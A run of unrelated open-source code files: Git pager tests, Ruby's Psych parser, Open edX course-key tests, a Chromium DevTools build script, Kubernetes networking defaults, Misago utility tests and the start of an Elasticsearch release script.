$full_command
) &&
${if_local_config}test_path_is_file core.pager_used
"
}
test_GIT_PAGER_overrides() {
parse_args "$@"
$test_expectation TTY "$cmd - GIT_PAGER overrides core.pager" "
rm -f GIT_PAGER_used &&
test_config core.pager wc &&
GIT_PAGER='wc >GIT_PAGER_used' &&
export GIT_PAGER &&
$full_command &&
test_path_is_file GIT_PAGER_used
"
}
test_doesnt_paginate() {
parse_args "$@"
$test_expectation TTY "no pager for '$cmd'" "
rm -f GIT_PAGER_used &&
GIT_PAGER='wc >GIT_PAGER_used' &&
export GIT_PAGER &&
$full_command &&
test_path_is_missing GIT_PAGER_used
"
}
test_pager_choices() {
test_default_pager expect_success "$@"
test_PAGER_overrides expect_success "$@"
test_core_pager_overrides expect_success "$@"
test_core_pager_subdir expect_success "$@"
test_GIT_PAGER_overrides expect_success "$@"
}
test_expect_success 'setup: some aliases' '
git config alias.aliasedlog log &&
git config alias.true "!true"
'
test_pager_choices 'git log'
test_pager_choices 'git -p log'
test_pager_choices 'git aliasedlog'
test_default_pager expect_success 'git -p aliasedlog'
test_PAGER_overrides expect_success 'git -p aliasedlog'
test_core_pager_overrides expect_success 'git -p aliasedlog'
test_core_pager_subdir expect_success 'git -p aliasedlog'
test_GIT_PAGER_overrides expect_success 'git -p aliasedlog'
test_default_pager expect_success 'git -p true'
test_PAGER_overrides expect_success 'git -p true'
test_core_pager_overrides expect_success 'git -p true'
test_core_pager_subdir expect_success 'git -p true'
test_GIT_PAGER_overrides expect_success 'git -p true'
test_default_pager expect_success test_must_fail 'git -p request-pull'
test_PAGER_overrides expect_success test_must_fail 'git -p request-pull'
test_core_pager_overrides expect_success test_must_fail 'git -p request-pull'
test_core_pager_subdir expect_success test_must_fail 'git -p request-pull'
test_GIT_PAGER_overrides expect_success test_must_fail 'git -p request-pull'
test_default_pager expect_success test_must_fail 'git -p'
test_PAGER_overrides expect_success test_must_fail 'git -p'
test_local_config_ignored expect_failure test_must_fail 'git -p'
test_GIT_PAGER_overrides expect_success test_must_fail 'git -p'
test_expect_success TTY 'core.pager in repo config works and retains cwd' '
sane_unset GIT_PAGER &&
test_config core.pager "cat >cwd-retained" &&
(
cd sub &&
rm -f cwd-retained &&
test_terminal git -p rev-parse HEAD &&
test_path_is_file cwd-retained
)
'
test_expect_success TTY 'core.pager is found via alias in subdirectory' '
sane_unset GIT_PAGER &&
test_config core.pager "cat >via-alias" &&
(
cd sub &&
rm -f via-alias &&
test_terminal git -c alias.r="-p rev-parse" r HEAD &&
test_path_is_file via-alias
)
'
test_doesnt_paginate expect_failure test_must_fail 'git -p nonsense'
test_pager_choices 'git shortlog'
test_expect_success 'setup: configure shortlog not to paginate' '
git config pager.shortlog false
'
test_doesnt_paginate expect_success 'git shortlog'
test_no_local_config_subdir expect_success 'git shortlog'
test_default_pager expect_success 'git -p shortlog'
test_core_pager_subdir expect_success 'git -p shortlog'
test_core_pager_subdir expect_success test_must_fail \
'git -p apply </dev/null'
test_expect_success TTY 'command-specific pager' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_unconfig core.pager &&
test_config pager.log "sed s/^/foo:/ >actual" &&
test_terminal git log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success TTY 'command-specific pager overrides core.pager' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_config core.pager "exit 1" &&
test_config pager.log "sed s/^/foo:/ >actual" &&
test_terminal git log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success TTY 'command-specific pager overridden by environment' '
GIT_PAGER="sed s/^/foo:/ >actual" && export GIT_PAGER &&
>actual &&
echo "foo:initial" >expect &&
test_config pager.log "exit 1" &&
test_terminal git log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success 'setup external command' '
cat >git-external <<-\EOF &&
#!/bin/sh
git "$@"
EOF
chmod +x git-external
'
test_expect_success TTY 'command-specific pager works for external commands' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_config pager.external "sed s/^/foo:/ >actual" &&
test_terminal git --exec-path="$(pwd)" external log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success TTY 'sub-commands of externals use their own pager' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_config pager.log "sed s/^/foo:/ >actual" &&
test_terminal git --exec-path=. external log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success TTY 'external command pagers override sub-commands' '
sane_unset PAGER GIT_PAGER &&
>actual &&
test_config pager.external false &&
test_config pager.log "sed s/^/log:/ >actual" &&
test_terminal git --exec-path=. external log --format=%s -1 &&
test_must_be_empty actual
'
test_expect_success 'command with underscores does not complain' '
write_script git-under_score <<-\EOF &&
echo ok
EOF
git --exec-path=. under_score >actual 2>&1 &&
echo ok >expect &&
test_cmp expect actual
'
test_expect_success TTY 'git tag with auto-columns ' '
test_commit one &&
test_commit two &&
test_commit three &&
test_commit four &&
test_commit five &&
cat >expect <<-\EOF &&
initial one two three four five
EOF
test_terminal env PAGER="cat >actual" COLUMNS=80 \
git -c column.ui=auto tag --sort=authordate &&
test_cmp expect actual
'
test_expect_success 'setup trace2' '
GIT_TRACE2_BRIEF=1 &&
export GIT_TRACE2_BRIEF
'
test_expect_success 'setup large log output' '
test-tool genzeros 50000 |
tr "\000" "a" |
sed "s/a/this is a long commit message/g" >commit-msg &&
git commit --allow-empty -F commit-msg
'
test_expect_success TTY 'git returns SIGPIPE on early pager exit' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager ">pager-used; head -n 1; exit 0" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
if test_have_prereq !MINGW
then
{ test_terminal git log >/dev/null; OUT=$?; } &&
test_match_signal 13 "$OUT"
else
test_terminal git log
fi &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:0 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'git returns SIGPIPE on early pager non-zero exit' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager ">pager-used; head -n 1; exit 1" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
if test_have_prereq !MINGW
then
{ test_terminal git log >/dev/null; OUT=$?; } &&
test_match_signal 13 "$OUT"
else
test_terminal git log
fi &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:1 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'git discards pager non-zero exit without SIGPIPE' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager "wc >pager-used; exit 1" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
test_terminal git log &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:1 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'git errors when asked to execute nonexisting pager' '
test_when_finished "rm -f err" &&
test_config core.pager "does-not-exist" &&
test_must_fail test_terminal git log 2>err &&
test_grep "unable to execute pager" err
'
test_expect_success TTY 'git returns SIGPIPE on propagated signals from pager' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager ">pager-used; exec test-tool sigchain" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
if test_have_prereq !MINGW
then
{ test_terminal git log >/dev/null; OUT=$?; } &&
test_match_signal 13 "$OUT"
else
test_terminal git log
fi &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:143 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'non-existent pager doesnt cause crash' '
test_config pager.show invalid-pager &&
test_must_fail test_terminal git show
'
test_done
|
unknown
|
github
|
https://github.com/git/git
|
t/t7006-pager.sh
|
# frozen_string_literal: true
module Psych
###
# YAML event parser class. This class parses a YAML document and calls
# events on the handler that is passed to the constructor. The events can
# be used for things such as constructing a YAML AST or deserializing YAML
# documents. It can even be fed back to Psych::Emitter to emit the same
# document that was parsed.
#
# See Psych::Handler for documentation on the events that Psych::Parser emits.
#
# Here is an example that prints out ever scalar found in a YAML document:
#
# # Handler for detecting scalar values
# class ScalarHandler < Psych::Handler
# def scalar value, anchor, tag, plain, quoted, style
# puts value
# end
# end
#
# parser = Psych::Parser.new(ScalarHandler.new)
# parser.parse(yaml_document)
#
# Here is an example that feeds the parser back in to Psych::Emitter. The
# YAML document is read from STDIN and written back out to STDERR:
#
# parser = Psych::Parser.new(Psych::Emitter.new($stderr))
# parser.parse($stdin)
#
# Psych uses Psych::Parser in combination with Psych::TreeBuilder to
# construct an AST of the parsed YAML document.
class Parser
class Mark < Struct.new(:index, :line, :column)
end
# The handler on which events will be called
attr_accessor :handler
# Set the encoding for this parser to +encoding+
attr_writer :external_encoding
###
# Creates a new Psych::Parser instance with +handler+. YAML events will
# be called on +handler+. See Psych::Parser for more details.
def initialize handler = Handler.new
@handler = handler
@external_encoding = ANY
end
###
# call-seq:
# parser.parse(yaml)
#
# Parse the YAML document contained in +yaml+. Events will be called on
# the handler set on the parser instance.
#
# See Psych::Parser and Psych::Parser#handler
def parse yaml, path = yaml.respond_to?(:path) ? yaml.path : "<unknown>"
_native_parse @handler, yaml, path
end
end
end
|
ruby
|
github
|
https://github.com/ruby/ruby
|
ext/psych/lib/psych/parser.rb
|
"""
Tests of CourseKeys and CourseLocators
"""
import ddt
from bson.objectid import ObjectId
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import BlockUsageLocator, CourseLocator
from opaque_keys.edx.tests import LocatorBaseTest, TestDeprecated
@ddt.ddt
class TestCourseKeys(LocatorBaseTest, TestDeprecated):
"""
Tests of :class:`.CourseKey` and :class:`.CourseLocator`
"""
@ddt.data(
"foo/bar/baz",
)
def test_deprecated_roundtrip(self, course_id):
self.assertEquals(
course_id,
unicode(CourseKey.from_string(course_id))
)
@ddt.data(
"foo!/bar/baz",
)
def test_invalid_chars_in_ssck_string(self, course_id):
with self.assertRaises(InvalidKeyError):
CourseKey.from_string(course_id)
@ddt.data(
"org/course/run/foo",
"org/course",
"org+course+run+foo",
"org+course",
)
def test_invalid_format_location(self, course_id):
with self.assertRaises(InvalidKeyError):
CourseLocator.from_string(course_id)
def test_make_usage_key(self):
depr_course = CourseKey.from_string('org/course/run')
self.assertEquals(
unicode(BlockUsageLocator(depr_course, 'category', 'name', deprecated=True)),
unicode(depr_course.make_usage_key('category', 'name'))
)
course = CourseKey.from_string('course-v1:org+course+run')
self.assertEquals(
unicode(BlockUsageLocator(course, 'block_type', 'block_id')),
unicode(course.make_usage_key('block_type', 'block_id'))
)
def test_convert_deprecation(self):
depr_course = CourseKey.from_string('org/course/run')
course = CourseKey.from_string('course-v1:org+course+run')
self.assertEquals(unicode(depr_course.replace(deprecated=False)), unicode(course))
self.assertEquals(unicode(course.replace(deprecated=True)), unicode(depr_course))
def test_course_constructor_underspecified(self):
with self.assertRaises(InvalidKeyError):
CourseLocator()
with self.assertRaises(InvalidKeyError):
CourseLocator(branch='published')
def test_course_constructor_bad_version_guid(self):
with self.assertRaises(ValueError):
CourseLocator(version_guid="012345")
with self.assertRaises(InvalidKeyError):
CourseLocator(version_guid=None)
def test_course_constructor_version_guid(self):
# generate a random location
test_id_1 = ObjectId()
test_id_1_loc = str(test_id_1)
testobj_1 = CourseLocator(version_guid=test_id_1)
self.check_course_locn_fields(testobj_1, version_guid=test_id_1)
self.assertEqual(str(testobj_1.version_guid), test_id_1_loc)
# Allow access to _to_string
# pylint: disable=protected-access
testobj_1_string = u'@'.join((testobj_1.VERSION_PREFIX, test_id_1_loc))
self.assertEqual(testobj_1._to_string(), testobj_1_string)
self.assertEqual(str(testobj_1), u'course-v1:' + testobj_1_string)
self.assertEqual(testobj_1.html_id(), u'course-v1:' + testobj_1_string)
self.assertEqual(testobj_1.version, test_id_1)
# Test using a given string
test_id_2_loc = '519665f6223ebd6980884f2b'
test_id_2 = ObjectId(test_id_2_loc)
testobj_2 = CourseLocator(version_guid=test_id_2)
self.check_course_locn_fields(testobj_2, version_guid=test_id_2)
self.assertEqual(str(testobj_2.version_guid), test_id_2_loc)
# Allow access to _to_string
# pylint: disable=protected-access
testobj_2_string = u'@'.join((testobj_2.VERSION_PREFIX, test_id_2_loc))
self.assertEqual(testobj_2._to_string(), testobj_2_string)
self.assertEqual(str(testobj_2), u'course-v1:' + testobj_2_string)
self.assertEqual(testobj_2.html_id(), u'course-v1:' + testobj_2_string)
self.assertEqual(testobj_2.version, test_id_2)
@ddt.data(
' mit.eecs',
'mit.eecs ',
CourseLocator.VERSION_PREFIX + '@mit.eecs',
BlockUsageLocator.BLOCK_PREFIX + '@black+mit.eecs',
'mit.ee cs',
'mit.ee,cs',
'mit.ee+cs',
'mit.ee&cs',
'mit.ee()cs',
CourseLocator.BRANCH_PREFIX + '@this',
'mit.eecs+' + CourseLocator.BRANCH_PREFIX,
'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@this+' + CourseLocator.BRANCH_PREFIX + '@that',
'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@this+' + CourseLocator.BRANCH_PREFIX,
'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@this ',
'mit.eecs+' + CourseLocator.BRANCH_PREFIX + '@th%is ',
)
def test_course_constructor_bad_package_id(self, bad_id):
"""
Test all sorts of badly-formed package_ids (and urls with those package_ids)
"""
with self.assertRaises(InvalidKeyError):
CourseLocator(org=bad_id, course='test', run='2014_T2')
with self.assertRaises(InvalidKeyError):
CourseLocator(org='test', course=bad_id, run='2014_T2')
with self.assertRaises(InvalidKeyError):
CourseLocator(org='test', course='test', run=bad_id)
with self.assertRaises(InvalidKeyError):
CourseKey.from_string('course-v1:test+{}+2014_T2'.format(bad_id))
@ddt.data(
'course-v1:',
'course-v1:/mit.eecs',
'http:mit.eecs',
'course-v1:mit+course+run{}@branch'.format(CourseLocator.BRANCH_PREFIX),
'course-v1:mit+course+run+',
)
def test_course_constructor_bad_url(self, bad_url):
with self.assertRaises(InvalidKeyError):
CourseKey.from_string(bad_url)
def test_course_constructor_url(self):
# Test parsing a url when it starts with a version ID and there is also a block ID.
# This hits the parsers parse_guid method.
test_id_loc = '519665f6223ebd6980884f2b'
testobj = CourseKey.from_string("course-v1:{}@{}+{}@hw3".format(
CourseLocator.VERSION_PREFIX, test_id_loc, CourseLocator.BLOCK_PREFIX
))
self.check_course_locn_fields(
testobj,
version_guid=ObjectId(test_id_loc)
)
def test_course_constructor_url_package_id_and_version_guid(self):
test_id_loc = '519665f6223ebd6980884f2b'
testobj = CourseKey.from_string(
'course-v1:mit.eecs+honors.6002x+2014_T2+{}@{}'.format(CourseLocator.VERSION_PREFIX, test_id_loc)
)
self.check_course_locn_fields(
testobj,
org='mit.eecs',
course='honors.6002x',
run='2014_T2',
version_guid=ObjectId(test_id_loc)
)
def test_course_constructor_url_package_id_branch_and_version_guid(self):
test_id_loc = '519665f6223ebd6980884f2b'
org = 'mit.eecs'
course = '~6002x'
run = '2014_T2'
testobj = CourseKey.from_string('course-v1:{}+{}+{}+{}@draft-1+{}@{}'.format(
org, course, run, CourseLocator.BRANCH_PREFIX, CourseLocator.VERSION_PREFIX, test_id_loc
))
self.check_course_locn_fields(
testobj,
org=org,
course=course,
run=run,
branch='draft-1',
version_guid=ObjectId(test_id_loc)
)
def test_course_constructor_package_id_no_branch(self):
org = 'mit.eecs'
course = '6002x'
run = '2014_T2'
testurn = '{}+{}+{}'.format(org, course, run)
testobj = CourseLocator(org=org, course=course, run=run)
self.check_course_locn_fields(testobj, org=org, course=course, run=run)
# Allow access to _to_string
# pylint: disable=protected-access
self.assertEqual(testobj._to_string(), testurn)
def test_course_constructor_package_id_separate_branch(self):
org = 'mit.eecs'
course = '6002x'
run = '2014_T2'
test_branch = 'published'
expected_urn = '{}+{}+{}+{}@{}'.format(org, course, run, CourseLocator.BRANCH_PREFIX, test_branch)
testobj = CourseLocator(org=org, course=course, run=run, branch=test_branch)
self.check_course_locn_fields(
testobj,
org=org,
course=course,
run=run,
branch=test_branch,
)
self.assertEqual(testobj.branch, test_branch)
# Allow access to _to_string
# pylint: disable=protected-access
self.assertEqual(testobj._to_string(), expected_urn)
def test_course_constructor_deprecated_offering(self):
org = 'mit.eecs'
course = '6002x'
run = '2014_T2'
offering = '{}/{}'.format(course, run)
test_branch = 'published'
with self.assertDeprecationWarning(count=2):
testobj = CourseLocator(org=org, offering=offering, branch=test_branch)
with self.assertRaises(InvalidKeyError):
CourseLocator(org=org, offering='', branch=test_branch)
with self.assertRaises(InvalidKeyError):
CourseLocator(org=org, offering=course, branch=test_branch)
self.check_course_locn_fields(
testobj,
org=org,
course=course,
run=run,
branch=test_branch,
)
@ddt.data(
"i4x://org/course/category/name",
"i4x://org/course/category/name@revision"
)
def test_make_usage_key_from_deprecated_string_roundtrip(self, url):
course_key = CourseLocator('org', 'course', 'run')
with self.assertDeprecationWarning(count=2):
self.assertEquals(
url,
course_key.make_usage_key_from_deprecated_string(url).to_deprecated_string()
)
def test_empty_run(self):
with self.assertRaises(InvalidKeyError):
CourseLocator('org', 'course', '')
self.assertEquals(
'org/course/',
unicode(CourseLocator('org', 'course', '', deprecated=True))
)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
#
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os.path
import sys
def generate_include_tag(resource_path):
(dir_name, file_name) = os.path.split(resource_path)
if (file_name.endswith('.js')):
return ' <script type="text/javascript" src="%s"></script>\n' % file_name
elif (file_name.endswith('.css')):
return ' <link rel="stylesheet" type="text/css" href="%s">\n' % file_name
else:
assert resource_path
def write_devtools_html(inspector_file, devtools_file, debug):
for line in inspector_file:
if not debug and '<script ' in line:
continue
if not debug and '<link ' in line:
continue
if '</head>' in line and not debug:
devtools_file.write(generate_include_tag("inspector.css"))
devtools_file.write(generate_include_tag("Main.js"))
devtools_file.write(line)
if '<head>' in line:
devtools_file.write(generate_include_tag("buildSystemOnly.js"))
def main(argv):
if len(argv) < 4:
print('usage: %s inspector_html devtools_html debug' % argv[0])
return 1
# The first argument is ignored. We put 'web.gyp' in the inputs list
# for this script, so every time the list of script gets changed, our html
# file is rebuilt.
inspector_html_name = argv[1]
devtools_html_name = argv[2]
debug = argv[3] != '0'
inspector_html = open(inspector_html_name, 'r')
devtools_html = open(devtools_html_name, 'w')
write_devtools_html(inspector_html, devtools_html, debug)
devtools_html.close()
inspector_html.close()
# Touch output file directory to make sure that Xcode will copy
# modified resource files.
if sys.platform == 'darwin':
output_dir_name = os.path.dirname(devtools_html_name)
os.utime(output_dir_name, None)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1
import (
v1 "k8s.io/api/core/v1"
networkingv1 "k8s.io/api/networking/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/utils/ptr"
)
func addDefaultingFuncs(scheme *runtime.Scheme) error {
return RegisterDefaults(scheme)
}
func SetDefaults_NetworkPolicyPort(obj *networkingv1.NetworkPolicyPort) {
// Default any undefined Protocol fields to TCP.
if obj.Protocol == nil {
proto := v1.ProtocolTCP
obj.Protocol = &proto
}
}
func SetDefaults_NetworkPolicy(obj *networkingv1.NetworkPolicy) {
if len(obj.Spec.PolicyTypes) == 0 {
// Any policy that does not specify policyTypes implies at least "Ingress".
obj.Spec.PolicyTypes = []networkingv1.PolicyType{networkingv1.PolicyTypeIngress}
if len(obj.Spec.Egress) != 0 {
obj.Spec.PolicyTypes = append(obj.Spec.PolicyTypes, networkingv1.PolicyTypeEgress)
}
}
}
func SetDefaults_IngressClass(obj *networkingv1.IngressClass) {
if obj.Spec.Parameters != nil && obj.Spec.Parameters.Scope == nil {
obj.Spec.Parameters.Scope = ptr.To(networkingv1.IngressClassParametersReferenceScopeCluster)
}
}
|
go
|
github
|
https://github.com/kubernetes/kubernetes
|
pkg/apis/networking/v1/defaults.go
|
#-*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.test.client import RequestFactory
from django.utils import timezone
from misago.core.utils import (clean_return_path, is_request_to_misago,
slugify, is_referer_local,
format_plaintext_for_html)
VALID_PATHS = (
"/",
"/threads/",
)
INVALID_PATHS = (
"",
"somewhere/",
)
class IsRequestToMisagoTests(TestCase):
def test_is_request_to_misago(self):
"""
is_request_to_misago correctly detects requests directed at Misago
"""
misago_prefix = reverse('misago:index')
for path in VALID_PATHS:
request = RequestFactory().get('/')
request.path_info = path
self.assertTrue(
is_request_to_misago(request),
'"%s" is not overlapped by "%s"' % (path, misago_prefix))
for path in INVALID_PATHS:
request = RequestFactory().get('/')
request.path_info = path
self.assertFalse(
is_request_to_misago(request),
'"%s" is overlapped by "%s"' % (path, misago_prefix))
class SlugifyTests(TestCase):
def test_valid_slugify_output(self):
"""Misago's slugify correctly slugifies string"""
test_cases = (
(u'Bob', u'bob'),
(u'Eric The Fish', u'eric-the-fish'),
(u'John Snow', u'john-snow'),
(u'J0n', u'j0n'),
(u'An###ne', u'anne'),
(u'S**t', u'st'),
(u'Łók', u'lok'),
)
for original, slug in test_cases:
self.assertEqual(slugify(original), slug)
PLAINTEXT_FORMAT_CASES = (
(
u'Lorem ipsum.',
u'<p>Lorem ipsum.</p>'
),
(
u'Lorem <b>ipsum</b>.',
u'<p>Lorem <b>ipsum</b>.</p>'
),
(
u'Lorem "ipsum" dolor met.',
u'<p>Lorem "ipsum" dolor met.</p>'
),
(
u'Lorem ipsum.\nDolor met.',
u'<p>Lorem ipsum.<br />Dolor met.</p>'
),
(
u'Lorem ipsum.\n\nDolor met.',
u'<p>Lorem ipsum.</p>\n\n<p>Dolor met.</p>'
),
(
u'http://misago-project.org/login/',
u'<p><a href="http://misago-project.org/login/">http://misago-project.org/login/</a></p>'
),
)
class FormatPlaintextForHtmlTests(TestCase):
def test_format_plaintext_for_html(self):
"""format_plaintext_for_html correctly formats plaintext for html"""
for plaintext, html in PLAINTEXT_FORMAT_CASES:
output = format_plaintext_for_html(plaintext)
assertion_message = """
format_plaintext_for_html failed to produce expected output:
expected: %s
return: %s
""" % (html, output)
self.assertEqual(output, html, assertion_message)
class MockRequest(object):
scheme = 'http'
def __init__(self, method, meta=None, post=None):
self.method = method
self.META = meta or {}
self.POST = post or {}
class CleanReturnPathTests(TestCase):
def test_get_request(self):
"""clean_return_path works for GET requests"""
bad_request = MockRequest('GET', {
'HTTP_REFERER': 'http://cookies.com',
'HTTP_HOST': 'misago-project.org'
})
self.assertIsNone(clean_return_path(bad_request))
bad_request = MockRequest('GET', {
'HTTP_REFERER': 'https://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertIsNone(clean_return_path(bad_request))
bad_request = MockRequest('GET', {
'HTTP_REFERER': 'https://misago-project.org/',
'HTTP_HOST': 'misago-project.org/assadsa/'
})
self.assertIsNone(clean_return_path(bad_request))
ok_request = MockRequest('GET', {
'HTTP_REFERER': 'http://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertEqual(clean_return_path(ok_request), '/')
ok_request = MockRequest('GET', {
'HTTP_REFERER': 'http://misago-project.org/login/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertEqual(clean_return_path(ok_request), '/login/')
def test_post_request(self):
"""clean_return_path works for POST requests"""
bad_request = MockRequest('POST', {
'HTTP_REFERER': 'http://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
}, {'return_path': '/sdasdsa/'})
self.assertIsNone(clean_return_path(bad_request))
ok_request = MockRequest('POST', {
'HTTP_REFERER': 'http://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
}, {'return_path': '/login/'})
self.assertEqual(clean_return_path(ok_request), '/login/')
class IsRefererLocalTests(TestCase):
def test_local_referers(self):
"""local referers return true"""
ok_request = MockRequest('GET', {
'HTTP_REFERER': 'http://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertTrue(is_referer_local(ok_request))
ok_request = MockRequest('GET', {
'HTTP_REFERER': 'http://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertTrue(is_referer_local(ok_request))
ok_request = MockRequest('GET', {
'HTTP_REFERER': 'http://misago-project.org/login/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertTrue(is_referer_local(ok_request))
def test_foreign_referers(self):
"""non-local referers return false"""
bad_request = MockRequest('GET', {
'HTTP_REFERER': 'http://else-project.org/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertFalse(is_referer_local(bad_request))
bad_request = MockRequest('GET', {
'HTTP_REFERER': 'https://misago-project.org/',
'HTTP_HOST': 'misago-project.org/'
})
self.assertFalse(is_referer_local(bad_request))
bad_request = MockRequest('GET', {
'HTTP_REFERER': 'http://misago-project.org/',
'HTTP_HOST': 'misago-project.org/assadsa/'
})
self.assertFalse(is_referer_local(bad_request))
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import re
import tempfile
import shutil
import os
import datetime
import json
import time
import sys
import argparse
import hmac
import urllib
import fnmatch
import socket
import urllib.request
import subprocess
from functools import partial
from http.client import HTTPConnection
from http.client import HTTPSConnection
"""
This tool builds a release from the a given elasticsearch branch.
In order to execute it go in the top level directory and run:
$ python3 dev_tools/build_release.py --branch 0.90 --publish --remote origin
By default this script runs in 'dry' mode which essentially simulates a release. If the
'--publish' option is set the actual release is done. The script takes over almost all
steps necessary for a release from a high level point of view it does the following things:
- run prerequisit checks ie. check for Java 1.7 being presend or S3 credentials available as env variables
- detect the version to release from the specified branch (--branch) or the current branch
- creates a release branch & updates pom.xml and Version.java to point to a release version rather than a snapshot
- builds the artifacts and runs smoke-tests on the build zip & tar.gz files
- commits the new version and merges the release branch into the source branch
- creates a tag and pushes the commit to the specified origin (--remote)
- publishes the releases to Sonatype and S3
Once it's done it will print all the remaining steps.
Prerequisites:
- Python 3k for script execution
- Boto for S3 Upload ($ apt-get install python-boto)
- RPM for RPM building ($ apt-get install rpm)
- S3 keys exported via ENV variables (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
- GPG data exported via ENV variables (GPG_KEY_ID, GPG_PASSPHRASE, optionally GPG_KEYRING)
- S3 target repository via ENV variables (S3_BUCKET_SYNC_TO, optionally S3_BUCKET_SYNC_FROM)
"""
env = os.environ
PLUGINS = [('license', 'elasticsearch/license/latest'),
('bigdesk', 'lukas-vlcek/bigdesk'),
('paramedic', 'karmi/elasticsearch-paramedic'),
('segmentspy', 'polyfractal/elasticsearch-segmentspy'),
('inquisitor', 'polyfractal/elasticsearch-inquisitor'),
('head', 'mobz/elasticsearch-head')]
LOG = env.get('ES_RELEASE_LOG', '/tmp/elasticsearch_release.log')
# console colors
COLOR_OK = '\033[92m'
COLOR_END = '\033[0m'
COLOR_FAIL = '\033[91m'
def log(msg):
log_plain('\n%s' % msg)
def log_plain(msg):
f = open(LOG, mode='ab')
f.write(msg.encode('utf-8'))
f.close()
def run(command, quiet=False):
log('%s: RUN: %s\n' % (datetime.datetime.now(), command))
if os.system('%s >> %s 2>&1' % (command, LOG)):
msg = ' FAILED: %s [see log %s]' % (command, LOG)
if not quiet:
print(msg)
